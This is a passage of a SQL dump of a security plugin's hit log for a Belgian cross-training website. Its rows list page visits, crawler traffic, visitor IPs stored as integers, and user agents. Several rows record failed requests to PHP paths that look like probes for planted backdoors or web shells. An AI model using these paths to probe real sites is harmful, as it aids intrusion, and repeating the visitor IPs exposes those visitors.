(75542, 1497759226.565066, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75543, 1497761388.217248, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; Google Web Preview Analytics) Chrome/41.0.2272.118 Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75544, 1497763980.719584, 2745959577, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(75545, 1497770953.766045, 1538656104, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/603.2.4 (KHTML, like Gecko)'),
(75546, 1497770954.298162, 1538656104, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75547, 1497770955.029792, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75548, 1497770955.675906, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75549, 1497770956.490958, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75550, 1497770956.994631, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75551, 1497770957.389567, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75552, 1497770957.833173, 1538656104, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(75553, 1497770958.230971, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75554, 1497770958.647309, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75555, 1497770959.062389, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75556, 1497770959.526861, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75557, 1497770959.920071, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75558, 1497770960.503018, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75559, 1497771858.636349, 1371104126, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.google.fr/', 'Mozilla/5.0 (Linux; Android 6.0; NEM-L51 Build/HONORNEM-L51) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36'),
(75560, 1497771862.688297, 1371104126, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/notre-philosophie/', 'Mozilla/5.0 (Linux; Android 6.0; NEM-L51 Build/HONORNEM-L51) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36'),
(75561, 1497771966.646577, 1538361201, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(75562, 1497771968.305866, 1538361201, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(75563, 1497772025.124413, 1538361201, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(75564, 1497772028.040994, 1538361201, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(75565, 1497772034.548363, 1538361201, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(75566, 1497772152.421527, 1538361201, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(75567, 1497772166.608049, 1538361201, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(75568, 1497772174.685162, 1538361201, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(75569, 1497772189.531717, 1538361201, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/notre-philosophie/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(75570, 1497772190.798078, 1538361201, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(75571, 1497772196.918399, 1538361201, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/en-images/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(75572, 1497775936.194385, 1833311020, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made/rss_feeder.class.php', 'http://crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made/rss_feeder.class.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(75573, 1497778208.240737, 872366385, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/feed/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(75574, 1497778227.953889, 1405240484, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.fr/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(75575, 1497778229.240779, 1405240484, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(75576, 1497784963.598396, 1568498493, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-forms-ajax.php', 'http://crosstrainingcenter.be/wp-forms-ajax.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(75577, 1497792496.609073, 2509962199, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'),
(75578, 1497796517.708893, 3475901815, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(75579, 1497798272.329446, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75580, 1497798272.782244, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75581, 1497799079.602568, 621928491, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/three-column-screen-layout/db.php', 'http://crosstrainingcenter.be/wp-content/plugins/three-column-screen-layout/db.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(75582, 1497799106.131502, 1540872244, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/framework.php', 'http://crosstrainingcenter.be/framework.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(75583, 1497800155.260640, 1837280593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko)'),
(75584, 1497800156.780882, 1837280593, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75585, 1497800157.624813, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75586, 1497800159.075994, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)');
INSERT INTO `wp_wfHits` (`id`, `ctime`, `IP`, `jsRun`, `is404`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`) VALUES
(75587, 1497800159.591988, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75588, 1497800160.003330, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75589, 1497800160.454268, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75590, 1497800161.711740, 1837280593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(75591, 1497800162.344510, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75592, 1497800163.048227, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75593, 1497800163.799855, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75594, 1497800164.291544, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75595, 1497800164.735867, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75596, 1497800165.156574, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75597, 1497800174.736085, 1475494039, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/content-wrapper.php', 'http://crosstrainingcenter.be/content-wrapper.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(75598, 1497800899.744868, 3475901899, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(75599, 1497801828.035889, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(75600, 1497801832.540106, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(75601, 1497801842.133359, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(75602, 1497801856.817384, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(75603, 1497801860.966327, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(75604, 1497801870.584478, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(75605, 1497801875.403037, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(75606, 1497801880.234765, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(75607, 1497802442.833884, 1538629115, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (Linux; Android 6.0; T08 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 OPR/42.7.2246.114996'),
(75608, 1497803154.951769, 1833311020, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/framework.php', 'http://crosstrainingcenter.be/framework.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(75609, 1497804105.058474, 1463838565, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5'),
(75610, 1497804982.099720, 3475901815, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(75611, 1497808633.911898, 1297196331, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-form-ajax.php', 'http://crosstrainingcenter.be/wp-form-ajax.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(75612, 1497810668.362994, 1538656104, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/603.2.4 (KHTML, like Gecko)'),
(75613, 1497810668.857294, 1538656104, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75614, 1497810669.484298, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75615, 1497810670.062894, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75616, 1497810670.699316, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75617, 1497810671.323001, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75618, 1497810671.851989, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75619, 1497810672.560853, 1538656104, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(75620, 1497810673.032222, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75621, 1497810673.475959, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75622, 1497810673.923747, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75623, 1497810674.397150, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75624, 1497810674.803818, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75625, 1497810675.211066, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75626, 1497810840.431818, 1838045613, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(75627, 1497810840.949692, 1838045613, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75628, 1497810841.408957, 1838045613, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75629, 1497810841.863276, 1838045613, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75630, 1497810842.333274, 1838045613, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75631, 1497810842.775297, 1838045613, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75632, 1497810843.370618, 1838045613, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75633, 1497810843.813114, 1838045613, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75634, 1497810844.327466, 1838045613, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75635, 1497810844.758181, 1838045613, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75636, 1497810845.214124, 1838045613, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75637, 1497813978.585388, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75638, 1497819429.902275, 3475901731, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(75639, 1497819430.556793, 3475901731, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(75640, 1497819431.141433, 3475901731, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(75641, 1497820032.336400, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75642, 1497824612.540854, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75643, 1497827389.328315, 1123631171, 0, 0, 1, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75644, 1497827390.231555, 1123631300, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75645, 1497827684.235364, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75646, 1497828103.665225, 1399309361, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', ''),
(75647, 1497828104.107019, 1399309361, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.0.3705;)'),
(75648, 1497834854.785685, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75649, 1497838499.574444, 846466161, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-content/plugins/easyrotator-for-wordpress/b.php', 'http://crosstrainingcenter.be/wp-content/plugins/easyrotator-for-wordpress/b.php', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(75650, 1497844710.219040, 2637637391, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(75651, 1497845793.034456, 1123631300, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75652, 1497852014.473563, 3024883481, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(75653, 1497853124.340462, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75654, 1497853424.969408, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
